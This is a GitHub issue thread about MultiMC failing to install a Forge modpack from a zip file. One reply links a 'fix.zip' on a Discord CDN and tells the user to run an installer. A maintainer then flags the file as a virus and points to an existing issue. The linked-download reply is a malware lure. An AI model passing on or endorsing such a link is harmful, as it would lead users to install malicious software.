### ISSUE TITLE
Not able to install forge modpacks from zip

### ISSUE THREAD

**Issue by shadvalentine** [MultiMC/Launcher#5504]
### Description of bug

Installing from zip should install modpacks, like it has in the past
It instead tells me it does not recognize the modpack type.

### Steps to reproduce

1. Click Add Instance
2. Click Install from zip
3. Browse to the newly download ATM9 zip file
4. Select the file and click open
5. Hit Ok

### This issue is unique

- [X] I have searched the issue tracker and did not find an issue describing my bug.

**Comment by Dominic54321** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by phit** [comment]
do not download that, its a virus

**Comment by phit** [comment]
@shadvalentine see https://github.com/MultiMC/Launcher/issues/4762
